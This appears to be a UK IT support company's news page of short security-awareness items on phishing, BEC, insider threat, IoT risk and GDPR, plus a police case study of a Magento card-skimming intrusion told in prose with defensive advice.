    Therefore, if your data has been leaked and you have been notified of this, you should take all steps necessary to prevent yourself being the next victim.

    To find out if your password has been leaked please visit https://haveibeenpwned.com , where you can check your email addresses to see if they are associated with any breaches and also find out what data was leaked.

    For any further information please do not hesitate to contact us!

  • URL SPOOFING

    A criminal will create a fake URL (website) which looks like a legitimate and secure website, but is actually set up to steal sensitive information for malicious purposes.

    Criminals will attempt to lure users into visiting the fake URL via phishing emails/SMS/social media. Typically, attackers have targeted financial services for a direct profit gain, however they also employ this tactic in many other scenarios.

    For example, recently universities in the UK have been targeted by overseas criminal groups. Attackers are using fake phishing websites which then redirect users to real login screens. By doing this, the attackers can then record any login details used, giving them access to online libraries which may include valuable intellectual property.

    ADVICE

    Make certain that you know how to defend against phishing. For detailed guidance, check out the entry on phishing from the NCSC's Small Business Guide [ https://www.ncsc.gov.uk/guidance/avoiding-phishing-attacks ].

    Always check that the URL of the website you are being asked to log into is what you are expecting (look for misspellings or variations of phrasing, and misleading domain endings e.g. 'orguk.com'). Other signs include a website not behaving in a typical way (odd pop-ups, incorrect links, inconsistent content).

    Protect your devices by ensuring that all software is frequently being patched and updated. These attacks exploit vulnerabilities, so make sure to use the latest versions of any software you have, and apply security patches promptly.

    Ensure that firewalls have been correctly configured to reduce the ability to visit malicious websites. If you are not responsible for this, ask your IT manager/provider to confirm this has been done.

    Install and run Antivirus software - make sure that it's updated regularly.

  • WATERING HOLE ATTACK

    A criminal will identify a website that is frequented by users inside a target organisation, compromise that website, and use it to distribute malicious software to the users.

    Watering hole attacks are an example of a supply chain attack, whereby criminals target websites thought to be regularly used by organisations of interest to them. These types of attacks are becoming increasingly successful with the increased use of third party web based services.

    A victim may be unaware that malware has been downloaded during their session, this is known as a 'drive by' attack. Alternatively, as they are usually on a trusted site, they may conciously download a file without knowing what it really contains.

    Typically, the malware used will be a Remote Access Trojan, which will enable the attacker to gain remote access to a target system to then perform a number of functions e.g. reconnaisance / exfiltrating data / distributing other malware.

    ADVICE

    Watering Hole attacks are a type of Supply Chain attack, so it's important that both your new and existing suppliers are evaluated for their cyber risk. Consider contractual clauses focused on security, and challenge your suppliers to practice and develop processes for reacting to compromise or data breaches. Note: Cyber Essentials accreditation is a good indicator for a supplier's reputation.

    Protect your devices and network by ensuring that everything is frequently being patched and updated. Watering Hole attacks exploit bugs and vulnerabilities, so it is crucial that you are using the latest versions of any software you have, and apply security patches promptly.

    Network Security - ensure that your firewalls and any other security products have been correctly configured to monitor and filter web traffic effectively. Monitoring your network for abnormalities is especially key to detecting malicious behaviour. If you are not responsible for this, ask your IT manager/provider to confirm this is being done.

  • INSIDER THREAT

    Threats that result from the actions of an employee, former employee, or stakeholder. Insider threats can be intentional or unintentional.

    Significant damage can be caused to a company from anyone who has, or at one time had, access to confidential or proprietary information. Insiders have knowledge and understanding of internal processes and structures, making it easier for them to cause incidents. As they already have access to company systems and physical, it can also be much harder for those incidents to be detected; this is a good example of why a company cannot rely solely on security software to detect threats.

    If an insider is actively seeking to harm a business, then they may use their login credentials to steal customer data or Intellectual Property, sabotage data or applications, or even expose sensitive email conversations which could cause reputational damage. These types of actors could be acting on personal motives (financial, emotional, or political), for a competitor, or under direction from other malicious parties e.g. extortion attempts.

    The unintentional insider threat can be just as damaging. Although there may be no intent to do harm, employees often make mistakes, they can have their accounts compromised, and they can also be socially engineered by attackers to enable malicious actions. Unfortunately, the majority of security incidents can be traced back to human error in some capacity.

    ADVICE

    Implement good hiring policies - make sure staff are vetted to a suitable degree. This should extend to third-party vendors, sub-contractors and other partners.

    Review firing policies - this includes revoking user access to systems before employees are informed that they are being let go, escorting them off premises, and changing any login credentials that they might know of.

    Use the principle of 'Least Privilege', which maintains that employees should only have access to data which they need for their role. Reducing the number of privileged staff means fewer staff who can conduct malicious activity, fewer accounts to be hacked, and fewer people to make high profile mistakes. With this in mind, it's important to update employee privileges when they change jobs, so they don't retain access to unnecessary and sensitive data.

    Segregation of duties - although you should reduce the number of privileged staff as outlined above, it's also good practice to make sure that business sensitive processes require more than one person to complete them. This can reduce fraud, error, and overreliance on single employees.

    Monitor user action. There are software solutions which monitor work sessions and network performance to detect abnormal user behaviour - this can be an option for organisations who have the budget and need to put this in place. Alternatively, if this isn't a suitable option, use the information available to you to observe how staff operate. It may be good practice to analyse business performance at certain times e.g. when certain employees are away on leave/busy financial periods etc.

    Implement regular cyber security training - this should cover all manner of threats, including social engineering and associated attacks such as Phishing/Spear Phishing/Business Email Compromise/CEO Fraud. Build a healthy working environment which encourages open communication. Not only can this reduce the likelihood of employees becoming malcontent, but staff will be more ready to discuss any security concerns they might have around their own work and that of others.

  • BUSINESS EMAIL COMPROMISE (BEC)

    A type of phishing attack where criminals impersonate senior executives, or departmental authority figures, in order to socially engineer victims into sending financial or other sensitive information to the attacker.

    There are various methods involved in BEC. One method attackers may employ is to use malicious software kits to gain access to a company's webmail exchange service. Once they have this access, they can then intercept invoices and alter payment details, or pose as senior employees to authorise transfers to fraudulent accounts.

    Other methods include designing an email to look as authentic as possible. For example, a fraudster may register a domain which looks very similar to a pre-existing legitimate one, and attempt to solicit fraud using associated email accounts. This was raised in a recent ActionFraud report regarding university suppliers. The report highlighted how attackers are registering domains that are similar to genuine university domains such as xxxxacu-uk.org, xxxxuk-ac.org and xxxacu.co.uk.

    These domains are used to contact suppliers and order high value goods such as IT equipment and pharmaceutical chemicals in the university’s name. The purchase order typically instructs delivery to an address, which may or may not be affiliated with the university. The items are then received by the criminals before being moved on, however no payment is received by the supplier.

     

    ADVICE

    1. Educate and train staff to be aware of and recognise BEC.Consider running simulated BEC/phishing exercises.
    2. Agree secure processes between employees internally and externally for your organisation to confirm certain purchases. Consider segregating duties, and make certain that employees know their responsibilities with regard to these processes.
    3. Ensure that you verify and corroborate all order requests from new customers. Use telephone numbers or email addresses found on the retailers website – do not use the details given on the suspicious email for verification purposes.
    4. If the order request is from a new contact at an organisation that’s an existing customer, verify the request through an established contact to make sure it is legitimate.
    5. Check any correspondence and documents for inconsistencies in spelling, grammar and content – this can be a sign that fraudsters are at work.
    6. Install and frequently update antivirus and anti-malware software to protect against malicious software.
    7. Consider employing DMARC - a free email authentication solution from the Global Cyber Alliance (online setup can be found at https://dmarc.globalcyberalliance.org)
    8. Every Report Matters – if you have been a victim of fraud or cyber crime, report it to Action Fraud (either online at www.actionfraud.police.uk or call 0300 123 2040).
  • IS YOUR WEBSITE SECURE?

    With the release of Chrome 68 this week, Google is now taking steps to make the web safer and is marking all websites that are not HTTPS as ‘Not Secure’

    With a HTTP site there is no SSL Certificate to encrypt your connection to the web server therefore anything sent over a HTTP connection is in plain text. Passwords, names, addresses, personal and bank details etc. are not encrypted giving an attacker the opportunity for to intercept this information.

    https logoSo, if your website is still running as HTTP, any of your visitors that are using Google Chrome will be warned with a ‘Not Secure’ message when visiting your website.

    By upgrading to HTTPS you also get the added benefit of Google algorithms favouring your website so that your Google ranking will be higher!

    If you need more information please give us a call on 01460 271055

  • INTERNET OF THINGS (IOT) SECURITY

    IoT devices are any physical devices that are able to connect to and communicate over the internet. This connectivity allows new opportunities for cyber criminals.

    IOTIoT devices such as cameras, home sensors, and even baby monitors have become hugely popular. Unfortunately, security has been an after thought for many manufacturers and consumers. Here are some threats related to IoT devices that you should be aware of.

    Insufficient authentication
    Weak passwords, and a lack of two factor authentication on many devices can make it easy for an attacker to gain access to your devices.

    Lack of Encryption
    Unencrypted data, possibly even passwords being sent over the air with no protection (a recent story involved IoT lightbulbs doing just this between each other).

    Physical Security
    Are cameras showing weak points? Employee screens? Stock levels? An attacker could leverage this for malicious purposes.

    Insecure software / hardware / firmware
    Some devices are unable to receive updates with security patches. Or, it may be that manufacturers simply do not release updates. This is a huge vulnerability. Similarly, if device credentials are hard coded in (i.e. unable to be changed), then if these are ever exposed then it becomes much easier for an attacker to compromise that device, as well as potentially other devices on that network.

    Insecure Networks
    Do you have ports open that shouldn't be? Could the device be compromised to conduct DDoS attacks?

  • STIMULATE THE MIDDLE AGED

    As many organisations want to support mobile, team-oriented and non-routine ways of working, an increasing number of them are looking for assistance in adopting digital workplace technology. A recent Gartner, Inc. survey concluded that only 7 percent to 18 percent of organisations possess the digital dexterity to adopt new ways of work (NWOW) solutions, such as virtual collaboration and mobile working.

    Not surprisingly they found that the youngest age group (18-24) are the most likely adopters of NWOW closely followed by the oldest (55-74). The group that were at the low point of the adoption dip (35-44), potentially feeling fatigued with the routines of life as middle age approaches. They were most likely to report that their jobs are routine, have the dimmest view of how technology can help their work, and are the least interested in mobile work.

  • COOL - I.T.

    It seems that the days of snow are finally behind us and that big golden thing in the sky has made an appearance.

    It’s time to enjoy the warmer temperatures but have you thought about the effect that the temperature has on your IT Equipment?

    coolitYou may have seen this error on your Phone or Tablet from time to time and you should always take measures to cool it as soon as possible.

    If you are out in the sun get it into the shade and allow it to cool as extended periods of heat can cause faster deterioration of the internal components and shorten the life of the battery. Mobile devices should be kept between 0°C and 35°C

    In your server room you run similar risks as extended periods of heat give you a much higher risk of system failure and downtime.

    A server should be kept running at between 20°C and 24°C and dangerous temperatures are classed as anything higher than 30°C

    If your server room is beyond this limit installation of an air conditioning unit should be considered.

    With a Blueloop Packaged Services Agreement we can monitor the temperature for you and take appropriate and safe shut-down action in extreme cases.

  • DATA BREACH

    A data breach means a breach of security leading to the accidental or unlawful destruction, loss, alteration, unathorised disclosure of, or access to, data.

    The reported number and scale of data breaches has continued to increase, with recent examples such as Dixons Carphone and PageUp as examples of larger organisations being exposed. Associated threats are many, including the potential for a number of various frauds using the actual data gained from the breach, or the media awareness around the breach (e.g. phishing/vishing/smishing attempts from attackers masquerading as employees of the affected company, or regulatory authorities etc.).

    If an organisation suffers a data breach, then the consequences can be dire. Financial damages can now include hefty fines from the ICO for non-compliance, and the reputational damage can be incredibly difficult to recover from.

    The techniques used in many cases are often not particularly advanced. Examples include exploiting unpatched vulnerabilities or spear-phishing, and a large number of incidents have been caused by third party suppliers failing to secure data properly. This highlights the importance of getting basic technical, and procedural security measures right.

  • CASE STUDY

    A major hardware distributor was the victim of a network intrusion whereby suspects had gained access to the backend of their .eu and .iu domains, through a vulnerability with the company’s webserver. It is believed that the suspect identified the type of webserver which the domains were hosted on using security scanning software tools such as Nmap or Metasploit. Once the type of webserver had been identified, the criminals would have ascertained that the company used the Magento ecommerce payment platform, which is used to manage their online financial transactions. Unfortunately, the Magento software which they use was vulnerable to cross site scripting (XSS), an attack type which we discuss below. This particular vulnerability had been present for over 6 months, and had not been patched.
     
    XSS is a code injection attack whereby an attacker can inject malicious scripts (payloads) into a legitimate website or web application, which are then executed by an end user. The xss would have given the suspect(s) access to the backend of their ie and eu domains, and from there the suspects had brute forced an old admin account which had lain dormant for 2 years. This would have been relatively easy to do, as the account had a weak password.
     
    Once customers reached the Magento payment section, a JavaScript file was triggered and the customer was presented with a ‘fake credentials payment section’, which looked identical to the correct payment section. The aim of the script was to fraudulently obtain the credit card details entered by customers. The compromised details were then sent in clear text to another domain. Interestingly, the payment type used determined whether the code was successful or not. For example, it was successful for debit cards but not PayPal – this was primarily down to poorly written code.
     
    In total, 138 customers were affected with compromised banking details, which were used in secondary fraud. The investigation identified the route of compromise and also a number of IP addresses, with the suspects using multiple VPN companies to remotely access the victim’s network.
     
    The investigation team was able to trace the malicious file back to a server in Eastern Europe, who had contacted the company using encrypted instant messaging and making payment through the cryptocurrency Bitcoins (BTC).
     
    Through extensive open source enquires and engagement with international law enforcement partners we were able to identify details of the organised crime group behind the attacks and provided this intelligence to overseas law enforcement for them to develop the intelligence and take proactive action against the suspect(s) identified. This investigation highlights the effective intelligence sharing between international agencies to tackle cyber crime on a global scale.

  • Implementation and Preparation

    ITIL (formerly an acronym for Information Technology Infrastructure Library) is a set of detailed practices for IT service management (ITSM) that focuses on aligning IT services with the needs of business.  This process is adopted here at Blueloop for our customers.

    Recent publicity regarding poorly implemented system upgrades for the banking industry clearly demonstrates that upgrade and system improvements need to be well planned and tested in a live ‘pilot’ before implementation.  Using ITIL’s industry standard for both IT project delivery and IT support provide suitable controls and measures for organisations in a professional and efficient manner. 

    Why risk business disruption when there are industry tools for IT service to protect your business?

  • SUPPLY CHAIN ATTACK

    Type of attack where security flaws or vulnerabilities are introduced into equipment, hardware, software, or services before they are supplied to, or used by, a target.

    Supply chain attacks can be used for a number of purposes, including breaching confidential data, stealing login credentials for further attacks, or even supplying defective equipment to prevent a service from being useable (a denial of service).

    One example saw attackers compromise legitimate websites through website builders used by creative and digital agencies. The criminals utilised a redirect script to send people to a malicious domain they owned, where malware was downloaded and installed by users who were browsing legitimate websites.

    Ongoing servicing, support, or updates may provide criminals with an opportunity to interfere with a supply chain.

  • Your Data Matters

    GDPR     How was it for you?       Did the sky fall in?

     

    After the email bombardment and mixed messages that we have all experienced about GDPR, it’s time to take a
    step back and reflect on a very sensible campaign that the Information Commissioners Office (ICO) has launched, called “Your Data Matters”.

    Their brief is a very straightforward one; “increase public trust and confidence in the way personal data is handled”.
    This comes at a time when our confidence on how this data is handled is at low ebb, with a recent Direct Marketing Association (DMA) study showing that 86% of consumers would like more control of how data is held and processed.

    The ICO campaign has cross-industry support from companies such as PwC, Sainsbury’s, and the BBC.

     

    Find out about your personal data rights and how to find advice concerning its use by third-parties by visiting https://ico.org.uk/your-data-matters/

    Five minutes well spent.

  • Backups+

    Organisations consider data management and security to be a simple nightly backup but Veeam believe there are 5 steps to data security nirvana and traditional backup is just the first.

    •     Backup: Back up all workloads and ensure recoverability of data loss or attack
    •     Aggregation: Manage data backup and recoverability across multiple environments with an aggregated view of SLA compliance
    •     Visibility: Deliver monitoring, resource optimisation, capacity planning, and built-in intelligence to improve
      multiple environment data management
    •     Orchestration: Move data to the best location across multiple environments to ensure business continuity,
      compliance, security, and optimal use of resources with an orchestration engine, that enables disaster recovery
      (DR) plans to be automatically and non-disruptively executed, tested, and documented
    •     Automation: Veeam's idea of nirvana in which data becomes self-managing, via data analysis,
      pattern recognition, and machine learning, and so automatically backed up, migrated to ideal locations, secured during anomalous activity, and recovered instantaneously

    We are not at the Automation stage yet but it's good to set our sights high.

    Blueloop work with Veeam to provide resilient data and system management solutions.

  • Cyber Intelligence Report

    SOUTH WEST POLICE

    Regional Crime Unit

     

    Spear Phishing

    A form of phishing where a specific person is deliberately targeted with an email typically containing personal information, purporting to be from a reputable source.

    Spear Phishing emails have the same end goal in mind as regular Phishing attacks - they are designed to make a potential victim interact with the email in some way, usually through clicking on a link or attachment. However, they are generally much more difficult to recognise, as the authors include highly relevant information which adds legitamacy to the correspondence.

    As an example, criminals often masquerade as vendors and email financial workers with attached invoices relating to recent orders that a company may have placed. Once the attachment is opened, malicious code is executed which can trigger various actions - such as stealing passwords, running cryptojacking software, or taking command of a computer to use in a future botnet for a DDoS attack.

    For more information https://www.swrocu.org.uk/cyber.aspx

  • A Question of GDPR

    The aim of the GDPR is to protect all EU citizens from privacy and data breaches in an increasingly data-driven world that is vastly different from the time in which the 1995 directive was established.

    Although the key principles of data privacy still hold true to the previous directive, many changes have been proposed to the regulatory policies; the key points of the GDPR as well as information on the impacts it will have on business can be found below.

By using this website you agree to our use of cookies to enhance your experience. I understand